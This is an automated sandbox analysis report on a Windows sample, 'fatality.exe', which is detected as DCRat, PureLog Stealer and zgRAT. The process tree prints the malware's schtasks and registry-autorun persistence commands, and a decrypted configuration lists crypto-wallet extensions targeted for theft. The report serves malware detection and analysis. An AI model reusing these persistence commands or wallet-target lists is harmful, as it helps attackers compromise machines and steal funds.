Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fatality.exe

Overview

General Information

Sample name:fatality.exe
Analysis ID:1589980
MD5:a7040b85fc683f088f4c6e5b44052c43
SHA1:7e3d644d1a1fb7b9bcccb6406d2e7fbd062eae66
SHA256:b786f31f1c89c71d0510bbd32510595d9891c67db516f968261b02594a423a8d
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • fatality.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\fatality.exe" MD5: A7040B85FC683F088F4C6E5B44052C43)
    • wscript.exe (PID: 4140 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6204 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • containerReview.exe (PID: 6536 cmdline: "C:\blockcomSession/containerReview.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
          • schtasks.exe (PID: 2300 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1812 cmdline: schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3652 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 6448 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 1984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5536 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 3504 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 2300 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 1292 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4072 cmdline: schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6760 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6456 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5336 cmdline: schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2888 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2920 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2164 cmdline: schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6520 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4072 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 432 cmdline: schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2888 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\containerReview.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 320 cmdline: schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6520 cmdline: schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 10 /tr "'C:\blockcomSession\containerReview.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6772 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 320 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 1476 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • containerReview.exe (PID: 7368 cmdline: "C:\Users\All Users\dbg\containerReview.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
  • mQBLhXIPAJ.exe (PID: 2172 cmdline: C:\blockcomSession\mQBLhXIPAJ.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
    • cmd.exe (PID: 7408 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7464 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7480 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • mQBLhXIPAJ.exe (PID: 7600 cmdline: "C:\blockcomSession\mQBLhXIPAJ.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
  • mQBLhXIPAJ.exe (PID: 5624 cmdline: C:\blockcomSession\mQBLhXIPAJ.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • containerReview.exe (PID: 7200 cmdline: C:\blockcomSession\containerReview.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • containerReview.exe (PID: 7216 cmdline: C:\blockcomSession\containerReview.exe MD5: F568E43BC473CD8CEB2553C58194DF61)
  • mQBLhXIPAJ.exe (PID: 7508 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
  • containerReview.exe (PID: 7696 cmdline: "C:\blockcomSession\containerReview.exe" MD5: F568E43BC473CD8CEB2553C58194DF61)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
fatality.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    fatality.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\dbg\containerReview.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\ProgramData\dbg\containerReview.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000005.00000000.2154251143.0000000000782000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000003.2039419279.0000000005FE3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.2038554623.0000000005FE7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Process Memory Space: containerReview.exe PID: 6536JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 2 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.fatality.exe.61276fb.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.fatality.exe.61276fb.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.fatality.exe.61236fb.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.fatality.exe.61236fb.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.fatality.exe.61236fb.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 3504, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Templates\mQBLhXIPAJ.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 6536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mQBLhXIPAJ
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 6536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mQBLhXIPAJ
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe", EventID: 13, EventType: SetValue, Image: C:\blockcomSession\containerReview.exe, ProcessId: 6536, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 6536, ParentProcessName: containerReview.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", ProcessId: 6448, ProcessName: csc.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\fatality.exe", ParentImage: C:\Users\user\Desktop\fatality.exe, ParentProcessId: 6532, ParentProcessName: fatality.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" , ProcessId: 4140, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\blockcomSession\containerReview.exe, ProcessId: 6536, TargetFilename: C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\blockcomSession/containerReview.exe", ParentImage: C:\blockcomSession\containerReview.exe, ParentProcessId: 6536, ParentProcessName: containerReview.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline", ProcessId: 6448, ProcessName: csc.exe

                                    Suricata Signatures

                                    No Suricata rule has matched

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: fatality.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                    Source: C:\Users\user\Desktop\RUDRugHQ.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\ProgramData\dbg\containerReview.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                    Source: C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\jPEOVQoM.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\AppData\Local\Temp\2BGdjLelXV.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\blockcomSession\containerReview.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                    Source: C:\Users\user\Desktop\GgZbKUMi.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\HTJtRROP.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeAvira: detection malicious, Label: TR/Spy.Agent.cptjt
                                    Source: C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeReversingLabs: Detection: 82%
                                    Source: C:\ProgramData\dbg\containerReview.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\mQBLhXIPAJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\user\Desktop\GgZbKUMi.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\HTJtRROP.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\LTranRbW.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\PRRjZxCV.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\RUDRugHQ.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\eTDxNkzS.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\jPEOVQoM.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\nCWNxMEA.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ucFnGTXv.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\yCQlabwB.logReversingLabs: Detection: 29%
                                    Source: C:\blockcomSession\containerReview.exeReversingLabs: Detection: 82%
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeReversingLabs: Detection: 82%
                                    Multi AV Scanner detection for submitted file
                                    Source: fatality.exeVirustotal: Detection: 83%Perma Link
                                    Source: fatality.exeReversingLabs: Detection: 71%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RUDRugHQ.logJoe Sandbox ML: detected
                                    Source: C:\ProgramData\dbg\containerReview.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\nCWNxMEA.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\jPEOVQoM.logJoe Sandbox ML: detected
                                    Source: C:\blockcomSession\containerReview.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RLUzQxgL.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\VquIdqjl.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\yCQlabwB.logJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: fatality.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
                                    Source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-KNZ6qT1z1KAE3Pr0GoKV","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: fatality.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\d81cfa058c78b8Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\7-Zip\Lang\d81cfa058c78b8Jump to behavior
